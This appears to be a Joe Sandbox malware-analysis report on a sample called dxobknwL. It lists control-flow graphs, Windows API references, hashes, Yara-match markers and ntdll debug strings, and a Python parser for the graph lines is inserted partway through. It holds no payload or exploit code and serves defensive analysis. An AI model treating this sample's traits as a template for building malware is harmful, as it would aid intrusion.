                                                                                          • Snapshot File: hcaresult_3_1_400000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$B$a```$gfff$gfff$gfff$gfff
                                                                                          • API String ID: 0-3667867154
                                                                                          • Opcode ID: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                                          • Instruction ID: 4d4c1e64281832a49f187a404ecdf2e47e159528420c40e4fc39f5ea6f09713e
                                                                                          • Opcode Fuzzy Hash: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                                          • Instruction Fuzzy Hash: 3C021771F0011947DB2C9959CC95BFE726AE794304F5881BBEA0AEF3E1E6389F448B44

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph
                                                                                          • 120 417b33-417b4f
                                                                                          • 121 417b57-417b5c
                                                                                          • 120->121
                                                                                          • 122 417b52 call 42f7c3
                                                                                          • 120->122
                                                                                          • 123 417b62-417b70 call 42fdc3
                                                                                          • 121->123
                                                                                          • 124 417b5e-417b61
                                                                                          • 121->124
                                                                                          • 122->121
                                                                                          • 127 417b80-417b91 call 42e263
                                                                                          • 123->127
                                                                                          • 128 417b72-417b7d call 430063
                                                                                          • 123->128
                                                                                          • 133 417b93-417ba7 LdrLoadDll
                                                                                          • 127->133
                                                                                          • 134 417baa-417bad
                                                                                          • 127->134
                                                                                          • 128->127
                                                                                          • 133->134
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                          • Instruction ID: 331d18eb78583633b9e29c6af9a4f26b0dc20ce173b82e1c0a0b08c061dba126
                                                                                          • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                          • Instruction Fuzzy Hash: 780112B5E4410DA7DB10DAA5DC42FDEB3789F54708F0041A6E90897240F635EB588795

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 158 42cb13-42cb4f call 404973 call 42dd63 NtClose
                                                                                          APIs
                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                                          • Instruction ID: 71597bb0a06a303982d629d451bdfe7f1673587ba4a769b47156b06249900e13
                                                                                          • Opcode Fuzzy Hash: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                                          • Instruction Fuzzy Hash: 44E0DF312002003BD220AA2AEC42F9B735CDBC5710F00441AFA09A7141C670790187E4

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 172 2a082b60-2a082b6c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 26ed15fdf6192a955ea59536ca9524410b12b669a19831d3cc615baaced994d2
                                                                                          • Instruction ID: 4ef24901cbd71409518d2155e00a19a22148368aebe8b83edec2e1e35473789d
                                                                                          • Opcode Fuzzy Hash: 26ed15fdf6192a955ea59536ca9524410b12b669a19831d3cc615baaced994d2
                                                                                          • Instruction Fuzzy Hash: 5F900471303401035105715C4454757440F47F0701F55C031F141C570DC53DCDD5713D
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 8b033286f847bc970a50d2ea02195f12deadf7589dea891256f6541c85c6c9fa
                                                                                          • Instruction ID: 63ba7aff5745e3dda4931652bf1db689491e53be169459f104ec6c397db945fa
                                                                                          • Opcode Fuzzy Hash: 8b033286f847bc970a50d2ea02195f12deadf7589dea891256f6541c85c6c9fa
                                                                                          • Instruction Fuzzy Hash: 4390023120148902E1107158844478A040547D0701F59C411A4828628D869989957129
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 620e7f991fbb809056809fdfcc472b84d7ef34258ae77fba0de7226a1bbd37c1
                                                                                          • Instruction ID: 2898a5122ab5f37384106697c28e953514a8bec8d014653589115483073a5f7f
                                                                                          • Opcode Fuzzy Hash: 620e7f991fbb809056809fdfcc472b84d7ef34258ae77fba0de7226a1bbd37c1
                                                                                          • Instruction Fuzzy Hash: 2290023120140513E11171584544747040947D0741F95C412A0828528D965A8A56B129
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: f5227543fc3fac2376d999ad7df27e214a12f9d4c35dc1d4548021620216c1ce
                                                                                          • Instruction ID: 2f834e485ca01ea5ed09b27fdc53a834f5e87e922f095814afba3afbe110bb5a
                                                                                          • Opcode Fuzzy Hash: f5227543fc3fac2376d999ad7df27e214a12f9d4c35dc1d4548021620216c1ce
                                                                                          • Instruction Fuzzy Hash: 4E90023160550502E10071584554746140547D0701F65C411A0828538D87998A5575AA

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(0j0OId92L,00000111,00000000,00000000), ref: 004143F0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: 0j0OId92L$0j0OId92L
                                                                                          • API String ID: 1836367815-695469284
                                                                                          • Opcode ID: bc8f5dee4bc18de4b9c16e2d65e2f97c7383ca15b1cbc30e1dcfe26fbc382a00
                                                                                          • Instruction ID: 395257a172b6fb01821a03ae621abc39386921b5435d80e57e368608866d07a4
                                                                                          • Opcode Fuzzy Hash: bc8f5dee4bc18de4b9c16e2d65e2f97c7383ca15b1cbc30e1dcfe26fbc382a00
                                                                                          • Instruction Fuzzy Hash: 0801C471E41218B6EB21A7D2DD02FDF7B78DF81B14F00806AFA047B180D7B856468BE9

                                                                                          Control-flow Graph

                                                                                          control_flow_graph
                                                                                          • 14 414373-414383
                                                                                          • 15 41438c-4143e1 call 42f693 call 417b33 call 4048e3 call 425283
                                                                                          • 14->15
                                                                                          • 16 414387 call 42ec83
                                                                                          • 14->16
                                                                                          • 25 414403-414408
                                                                                          • 15->25
                                                                                          • 26 4143e3-4143f4 PostThreadMessageW
                                                                                          • 15->26
                                                                                          • 16->15
                                                                                          • 26->25
                                                                                          • 27 4143f6-414400
                                                                                          • 26->27
                                                                                          • 27->25
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(0j0OId92L,00000111,00000000,00000000), ref: 004143F0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: 0j0OId92L$0j0OId92L
                                                                                          • API String ID: 1836367815-695469284
                                                                                          • Opcode ID: 270c509a88a863fe0634043b7060cc8d830b64c78b137e5f7cde7d2a5c309eed
                                                                                          • Instruction ID: ae0f3591e816a9f46982110179c6327102946865d15a57d5eabb58516dd05135
                                                                                          • Opcode Fuzzy Hash: 270c509a88a863fe0634043b7060cc8d830b64c78b137e5f7cde7d2a5c309eed
                                                                                          • Instruction Fuzzy Hash: E601DB71E4021876DB11A6D29C02FDF7B7C9F41B14F04806AFA047B2C1D6B856068BE9

                                                                                          Control-flow Graph

                                                                                          control_flow_graph
                                                                                          • 28 401af2-401b18
                                                                                          • 29 401b20-401b33
                                                                                          • 28->29
                                                                                          • 29->29
                                                                                          • 30 401b35-401b51 call 4010e0
                                                                                          • 29->30
                                                                                          • 33 401b56-401b5c
                                                                                          • 30->33
                                                                                          • 33->33
                                                                                          • 34 401b5e-401b82 call 401d70
                                                                                          • 33->34
                                                                                          • 37 401b87-401b8d
                                                                                          • 34->37
                                                                                          • 37->37
                                                                                          • 38 401b8f-401b9e
                                                                                          • 37->38
                                                                                          • 39 401ba3-401ba4
                                                                                          • 38->39
                                                                                          • 39->39
                                                                                          • 40 401ba6-401bab
                                                                                          • 39->40
                                                                                          • 41 401bb0-401bc1
                                                                                          • 40->41
                                                                                          • 41->41
                                                                                          • 42 401bc3-401bd8
                                                                                          • 41->42
                                                                                          • 42->42
                                                                                          • 43 401bda-401bdf
                                                                                          • 42->43
                                                                                          • 44 401be0-401bf1
                                                                                          • 43->44
                                                                                          • 44->44
                                                                                          • 45 401bf3-401c19 EntryPoint
                                                                                          • 44->45
                                                                                          • 46 401c20-401c26
                                                                                          • 45->46
                                                                                          • 46->46
                                                                                          • 47 401c28 call 430153
                                                                                          • 46->47
                                                                                          • 48 401c2a-401c2d
                                                                                          • 47->48
                                                                                          • 49 401c32-401c45
                                                                                          • 48->49
                                                                                          • 49->49
                                                                                          • 50 401c47-401c4c
                                                                                          • 49->50
                                                                                          • 51 401c50-401c61
                                                                                          • 50->51
                                                                                          • 51->51
                                                                                          • 52 401c63-401c78
                                                                                          • 51->52
                                                                                          APIs
                                                                                          • EntryPoint.DXOBKNWL(?,0000032C,?), ref: 00401BFF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EntryPoint
                                                                                          • String ID: a```
                                                                                          • API String ID: 3225343992-3259403941
                                                                                          • Opcode ID: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                                          • Instruction ID: 9cd544999dd2b03daafdb1c4164150612a4eeb260070e7f16c4efc787f4e75c6
                                                                                          • Opcode Fuzzy Hash: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                                          • Instruction Fuzzy Hash: ED31F771F042194BDF1C86288C507AEB666DB94344F4881BBE909AF7E1E6786E448B84

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 54 42ce73-42ceb7 call 404973 call 42dd63 RtlFreeHeap
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CEB2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID: whA
                                                                                          • API String ID: 3298025750-33568622
                                                                                          • Opcode ID: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                                          • Instruction ID: df9e10e1718a61ed7688cb98799c3328294b3d2316893391272a51bf3c6f2a62
                                                                                          • Opcode Fuzzy Hash: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                                          • Instruction Fuzzy Hash: 5EE06DB26002047BD610EF59EC81EAB33ACEFC5710F40401AFA08A7241C671B910CBF9

                                                                                          Control-flow Graph

                                                                                          control_flow_graph
                                                                                          • 98 417bb3-417bc4
                                                                                          • 99 417b81-417b83
                                                                                          • 98->99
                                                                                          • 100 417bc6-417bd3
                                                                                          • 98->100
                                                                                          • 103 417b89-417b91
                                                                                          • 99->103
                                                                                          • 104 417b84 call 42e263
                                                                                          • 99->104
                                                                                          • 101 417bd5-417bd6
                                                                                          • 100->101
                                                                                          • 102 417bd7-417bde
                                                                                          • 100->102
                                                                                          • 101->102
                                                                                          • 107 417be1-417be7
                                                                                          • 102->107
                                                                                          • 105 417b93-417ba7 LdrLoadDll
                                                                                          • 103->105
                                                                                          • 106 417baa-417bad
                                                                                          • 103->106
                                                                                          • 104->103
                                                                                          • 105->106
                                                                                          • 108 417be9
                                                                                          • 107->108
                                                                                          • 109 417bed-417bf5
                                                                                          • 107->109
                                                                                          • 110 417bea
                                                                                          • 108->110
                                                                                          • 111 417c5f-417c64
                                                                                          • 108->111
                                                                                          • 112 417bfa-417c03
                                                                                          • 109->112
                                                                                          • 110->112
                                                                                          • 115 417beb-417bec
                                                                                          • 110->115
                                                                                          • 113 417c41-417c55
                                                                                          • 111->113
                                                                                          • 114 417c66-417c6f
                                                                                          • 111->114
                                                                                          • 112->113
                                                                                          • 113->107
                                                                                          • 118 417c57-417c58
                                                                                          • 113->118
                                                                                          • 117 417c71-417c91
                                                                                          • 114->117
                                                                                          • 115->109
                                                                                          • 118->117
                                                                                          • 119 417c5a-417c5e
                                                                                          • 118->119
                                                                                          • 119->111
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                                          • Instruction ID: 93b2374f167c02f6a28249779b1fd5adc8fce152e1fc3efdeaf84b546dfcf957
                                                                                          • Opcode Fuzzy Hash: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                                          • Instruction Fuzzy Hash: 4421C07294C206ABDB00E9749846ACB7774FB45318F04455AD80C9B702E739B6968BD5

                                                                                          Control-flow Graph

                                                                                          control_flow_graph
                                                                                          • 135 417b27-417b30
                                                                                          • 136 417b90-417ba7 LdrLoadDll
                                                                                          • 135->136
                                                                                          • 137 417b32-417b5c call 42f7c3
                                                                                          • 135->137
                                                                                          • 138 417baa-417bad
                                                                                          • 136->138
                                                                                          • 142 417b62-417b70 call 42fdc3
                                                                                          • 137->142
                                                                                          • 143 417b5e-417b61
                                                                                          • 137->143
                                                                                          • 146 417b80-417b91 call 42e263
                                                                                          • 142->146
                                                                                          • 147 417b72-417b7d call 430063
                                                                                          • 142->147
                                                                                          • 146->138
                                                                                          • 152 417b93-417ba7 LdrLoadDll
                                                                                          • 146->152
                                                                                          • 147->146
                                                                                          • 152->138
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                                          • Instruction ID: 520125f5abcca6f32ee259adfec299557dcb37a3b4497778880cbe12b8f3150b
                                                                                          • Opcode Fuzzy Hash: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                                          • Instruction Fuzzy Hash: A4F02BB190C24DABCB20CE64DC409DDBB74AF55234F0487EED998671C2E2305649C756

                                                                                          Control-flow Graph
                                                                                          control_flow_graph 153 42ce23-42ce67 call 404973 call 42dd63 RtlAllocateHeap
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,0041E934,?,?,00000000,?,0041E934,?,?,?), ref: 0042CE62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                                          • Instruction ID: 54a44c9eb01fc689f5ac2f601c65d0757ab140ae4e4e75f286cde17a1d142988
                                                                                          • Opcode Fuzzy Hash: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                                          • Instruction Fuzzy Hash: 86E06DB52042047BD620EE59EC45EEB37ADEFC5710F40441AFA48A7241CA70B9108BB9

                                                                                          Control-flow Graph
                                                                                          control_flow_graph 163 42cec3-42ceff call 404973 call 42dd63 ExitProcess
                                                                                          APIs
                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,43F334D9,?,?,43F334D9), ref: 0042CEFA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExitProcess
                                                                                          • String ID:
                                                                                          • API String ID: 621844428-0
                                                                                          • Opcode ID: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                                          • Instruction ID: 54eb179f5a4ec7a69d43dd70d9c2d94cb10809d16adc756a8638f1923563bae3
                                                                                          • Opcode Fuzzy Hash: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                                          • Instruction Fuzzy Hash: 64E04F712102147BD120EA6ADC41F9BB76CDBC5714F40802AFA08A7281C670B90187F4

                                                                                          Control-flow Graph
                                                                                          control_flow_graph 168 2a082c0a-2a082c0f 169 2a082c1f-2a082c26 LdrInitializeThunk 168->169 170 2a082c11-2a082c18 168->170
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 7f1e834884e820e5bf0b24643fcbf7b7114464f6e6eaebce0dd1c4f614195ce2
                                                                                          • Instruction ID: 0a97edc640bcadd4161d1c8da0306c766e151706507d9e1903e2f82d5fd7e0de
                                                                                          • Opcode Fuzzy Hash: 7f1e834884e820e5bf0b24643fcbf7b7114464f6e6eaebce0dd1c4f614195ce2
                                                                                          • Instruction Fuzzy Hash: 22B09B719015C5C9E641F76056087177D4067D4701F15C071D2534655F473CC5D5F17D
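The `control_flow_graph` lines above are a flattened text dump of the per-function graphs: a decimal node id followed by its hex address range, optional `call <addr>` tokens for internal callees, bare API names for imported references, and `src->dst` tokens for edges. The following parser is an added example, not code from Joe Sandbox or from this report; its tokenization rules are inferred from the three graph lines on this page and are an assumption, as is every helper name. The three input lines are copied from the report so the example runs offline, and the helpers answer the questions an analyst usually has when reading such a dump: which basic blocks reference a given API (here `LdrLoadDll`), which block is the function entry, and whether the API site is reachable from it.

```python
import re
from collections import deque
from dataclasses import dataclass, field

# Constructed input: the control_flow_graph lines copied verbatim from the
# report entries above (functions at 0x417b27, 0x42ce23 and 0x2a082c0a).
CFG_LINES = [
    "control_flow_graph 135 417b27-417b30 136 417b90-417ba7 LdrLoadDll 135->136 "
    "137 417b32-417b5c call 42f7c3 135->137 138 417baa-417bad 136->138 "
    "142 417b62-417b70 call 42fdc3 137->142 143 417b5e-417b61 137->143 "
    "146 417b80-417b91 call 42e263 142->146 147 417b72-417b7d call 430063 142->147 "
    "146->138 152 417b93-417ba7 LdrLoadDll 146->152 147->146 152->138",
    "control_flow_graph 153 42ce23-42ce67 call 404973 call 42dd63 RtlAllocateHeap",
    "control_flow_graph 168 2a082c0a-2a082c0f 169 2a082c1f-2a082c26 "
    "LdrInitializeThunk 168->169 170 2a082c11-2a082c18 168->170",
]

EDGE = re.compile(r"^(\d+)->(\d+)$")          # "135->136"
RANGE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)$")  # "417b27-417b30"


@dataclass
class Block:
    start: int
    end: int
    calls: list = field(default_factory=list)  # internal callees, as integers
    apis: list = field(default_factory=list)   # named imported API references


@dataclass
class Graph:
    blocks: dict = field(default_factory=dict)  # node id -> Block
    edges: list = field(default_factory=list)   # (src, dst) node id pairs


def parse_cfg(line: str) -> Graph:
    """Parse one control_flow_graph line into blocks and edges (assumed grammar)."""
    toks = line.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    g = Graph()
    cur = None
    i = 1
    while i < len(toks):
        t = toks[i]
        m = EDGE.match(t)
        if m:
            g.edges.append((int(m.group(1)), int(m.group(2))))
        elif t.isdigit():
            # A bare decimal token starts a node; its hex range must follow.
            rng = RANGE.match(toks[i + 1]) if i + 1 < len(toks) else None
            if not rng:
                raise ValueError(f"node {t} is not followed by an address range")
            cur = int(t)
            g.blocks[cur] = Block(int(rng.group(1), 16), int(rng.group(2), 16))
            i += 1
        elif t == "call":
            g.blocks[cur].calls.append(int(toks[i + 1], 16))
            i += 1
        else:
            g.blocks[cur].apis.append(t)
        i += 1
    return g


def entry_nodes(g: Graph) -> list:
    """Nodes with no incoming edge; for a well-formed function this is the entry."""
    targets = {dst for _, dst in g.edges}
    return sorted(n for n in g.blocks if n not in targets)


def blocks_referencing(g: Graph, api: str) -> list:
    return sorted(n for n, b in g.blocks.items() if api in b.apis)


def reachable(g: Graph, src: int) -> set:
    """Breadth-first reachability over the edge list, including src itself."""
    seen, todo = {src}, deque([src])
    while todo:
        n = todo.popleft()
        for s, d in g.edges:
            if s == n and d not in seen:
                seen.add(d)
                todo.append(d)
    return seen


def api_reachable_from_entry(g: Graph, api: str) -> bool:
    sites = set(blocks_referencing(g, api))
    return any(sites & reachable(g, e) for e in entry_nodes(g))


if __name__ == "__main__":
    for line in CFG_LINES:
        g = parse_cfg(line)
        apis = sorted({a for b in g.blocks.values() for a in b.apis})
        for api in apis:
            print(f"entry {entry_nodes(g)} -> {api} at blocks "
                  f"{blocks_referencing(g, api)}, reachable={api_reachable_from_entry(g, api)}")
```

For the first graph the parser yields nine blocks and eleven edges, with `LdrLoadDll` referenced from blocks 136 and 152; note that those two blocks (417b90-417ba7 and 417b93-417ba7) overlap, which is how the dump presents the single `LdrLoadDll` site at 00417BA5 listed under APIs.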
                                                                                          Strings
                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 2A0F8DD3
                                                                                          • *** Inpage error in %ws:%s, xrefs: 2A0F8EC8
                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 2A0F8DC4
                                                                                          • <unknown>, xrefs: 2A0F8D2E, 2A0F8D81, 2A0F8E00, 2A0F8E49, 2A0F8EC7, 2A0F8F3E
                                                                                          • *** then kb to get the faulting stack, xrefs: 2A0F8FCC
                                                                                          • an invalid address, %p, xrefs: 2A0F8F7F
                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 2A0F8E4B
                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 2A0F8F2D
                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 2A0F8F3F
                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 2A0F8DB5
                                                                                          • Go determine why that thread has not released the critical section., xrefs: 2A0F8E75
                                                                                          • The resource is owned exclusively by thread %p, xrefs: 2A0F8E24
                                                                                          • The resource is owned shared by %d threads, xrefs: 2A0F8E2E
                                                                                          • write to, xrefs: 2A0F8F56
                                                                                          • The instruction at %p tried to %s , xrefs: 2A0F8F66
                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 2A0F8E86
                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 2A0F8F26
                                                                                          • This failed because of error %Ix., xrefs: 2A0F8EF6
                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 2A0F8E02
                                                                                          • *** enter .exr %p for the exception record, xrefs: 2A0F8FA1
                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 2A0F8E3F
                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 2A0F8F34
                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 2A0F8FEF
                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 2A0F8DA3
                                                                                          • The instruction at %p referenced memory at %p., xrefs: 2A0F8EE2
                                                                                          • *** enter .cxr %p for the context, xrefs: 2A0F8FBD
                                                                                          • The critical section is owned by thread %p., xrefs: 2A0F8E69
                                                                                          • a NULL pointer, xrefs: 2A0F8F90
                                                                                          • read from, xrefs: 2A0F8F5D, 2A0F8F62
                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 2A0F8D8C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                          • API String ID: 0-108210295
